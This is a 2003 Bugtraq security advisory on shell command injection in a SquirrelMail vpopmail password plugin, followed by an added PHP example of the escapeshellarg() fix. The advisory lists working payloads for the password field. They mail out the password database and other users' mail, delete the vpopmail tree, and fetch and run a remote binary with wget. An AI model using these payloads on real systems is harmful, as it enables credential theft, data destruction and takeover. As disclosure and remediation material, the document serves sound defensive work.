[29280] in bugtraq


VPOPMail Account Administration (squirrel mail) version 0.9.7

daemon@ATHENA.MIT.EDU (error)
Wed Mar 12 13:17:10 2003

From: error <error@lostinthenoise.net>
To: bugtraq@securityfocus.com
Message-Id: <1047489900.1421.337.camel@eris>
Mime-Version: 1.0
Date: 12 Mar 2003 09:25:01 -0800


Plugin info: http://www.squirrelmail.org/plugin_view.php?id=103

Description:

VPOPMail Account Administration
The plugin lets the user do the tasks he would be able to do using qmailadmin:

change password
forward mail
create away messages

Notes (from the README):

************* IMPORTANT ************
    For the plugin to work correctly, the Web-Server needs to run as the
    same user as vpopmail does (most common: user vpopmail).
    This is because the plugin needs write-permissions to the users'
    Maildir to
    - create appropriate .qmail-files
    - create away-messages


Comments (from myself):

This (allowing anything to be executed as the web user) of course is a
huge security hole. This actually goes beyond that and says to run the
web server as vpopmail!

Amazing!
These people are far too trusting of their users.

Bad idea.

What could be worse?

How about making it even easier to exploit every vpopmail binary?

How?

Unclean input parsing!

If the vpopmail user is the same as the webuser you get to have fun
with:

vaddaliasdomain  vconvert         vdominfo         vpasswd
vadddomain       vdeldomain       vipmap           vpopbull
vadduser         vdelivermail     vkill            vqmaillocal
valias           vdeloldusers     vmkpasswd        vsetuserquota
vchkpw           vdeluser         vmoduser         vuserinfo

Basically the exploits are unlimited (as you get full access rights to
vpopmail):

#change password
password;~vpopmail/bin/vpasswd user@host password

#mail password database
password;cat ~vpopmail/domains/example.com/vpasswd|mail -s owned
user@host

#remove vpopmail
password;rm -rf ~vpopmail/

#get listings of mail
password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail user@host

#read any users mail
passwd;cat ~vpopmail/domains/example.com/user/Maildir/new//1027359339.48628.example.com\,S\=2432 | mail user@host

#execute other arbitrary code on server
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;

Here is the offending code (line 45 in vpopmail.php):

system("$vpasswd $username $pwd");

As we can see, this is very bad.

Very bad security model (running your webserver as vpopmail) backed up by
sloppy coding (passing user entered data into the shell unescaped) == bad
bad bad.

So you just pass anything I wrote above (or really anything at all that
you desire) and you own the system's vpopmail config.

Enter this data into the password changing field (make sure it matches
up in both) in the squirrel mail vpopmail password section to exploit.

But it's just a plugin to a webmail system, so no big deal ;-)

-- 
error <error@lostinthenoise.net>

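The injection described in the post, as an added example that is not part of the original message or of the vpopmail plugin's own code: the command string the plugin builds with system("$vpasswd $username $pwd") next to a hardened version that passes every user-supplied word through escapeshellarg() and rejects implausible mailbox names before anything reaches the shell. The vpasswd path, the mailbox regex and the function names are assumptions made for the example.

```php
<?php
// Added example, not code from the plugin. Demonstrates why
//   system("$vpasswd $username $pwd");
// is a shell command injection and what the hardened call looks like.

// Assumed install location of the vpopmail binary.
$vpasswd = '/home/vpopmail/bin/vpasswd';

// Vulnerable: the exact string the original plugin hands to /bin/sh.
// Shell metacharacters in $username or $pwd (; | ` $ &) are interpreted
// by the shell, so "password;rm -rf ~vpopmail/" runs two commands.
function vulnerable_command(string $vpasswd, string $username, string $pwd): string
{
    return "$vpasswd $username $pwd";
}

// Hardened: each argument is wrapped in single quotes by escapeshellarg(),
// which also escapes embedded single quotes. The shell then passes the
// whole payload to vpasswd as one argv entry instead of executing it.
function hardened_command(string $vpasswd, string $username, string $pwd): string
{
    return escapeshellarg($vpasswd) . ' '
         . escapeshellarg($username) . ' '
         . escapeshellarg($pwd);
}

// Additional input validation (assumed pattern): only accept something
// shaped like local@domain so junk never gets near the shell at all.
function valid_mailbox(string $username): bool
{
    return preg_match('/^[A-Za-z0-9._-]+@[A-Za-z0-9.-]+$/', $username) === 1;
}

// Constructed inputs: a legitimate mailbox and one payload from the post.
$username = 'user@example.com';
$payload  = 'password;rm -rf ~vpopmail/';

echo "vulnerable: ", vulnerable_command($vpasswd, $username, $payload), "\n";
echo "hardened:   ", hardened_command($vpasswd, $username, $payload), "\n";

// The mailbox check rejects metacharacters in the username field too.
foreach (['user@example.com', 'user@host;id', '$(id)@example.com'] as $candidate) {
    echo $candidate, ' => ', valid_mailbox($candidate) ? 'accepted' : 'rejected', "\n";
}

// Only the hardened string should ever be given to system().
if (valid_mailbox($username)) {
    $cmd = hardened_command($vpasswd, $username, $payload);
    // system($cmd);  // left commented out so the example runs without vpopmail
}
```

Printing the two strings side by side shows the difference: in the vulnerable form the `;` ends the vpasswd command and `rm -rf ~vpopmail/` is a second command, while in the hardened form the same bytes are a single quoted password argument. Note that escaping fixes the coding mistake only; it does nothing about the README's design, where the web server runs as vpopmail. Any other bug in the web tier still reaches every vpopmail binary and every Maildir with full rights, so the process-identity problem needs fixing independently of the escaping.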

